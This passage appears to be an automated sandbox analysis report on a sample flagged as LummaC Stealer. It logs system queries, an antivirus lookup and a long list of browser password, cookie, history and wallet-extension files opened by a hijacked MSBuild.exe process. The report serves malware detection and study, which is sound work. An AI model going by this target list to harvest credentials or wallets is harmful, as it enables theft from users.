Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD68964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

0_2_00007FF66FD68964

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD62C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,

0_2_00007FF66FD62C54

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: MSBuild.exe, 0000000E.00000002.1404136776.000000000167C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 0000000E.00000002.1404835461.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.1398137512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
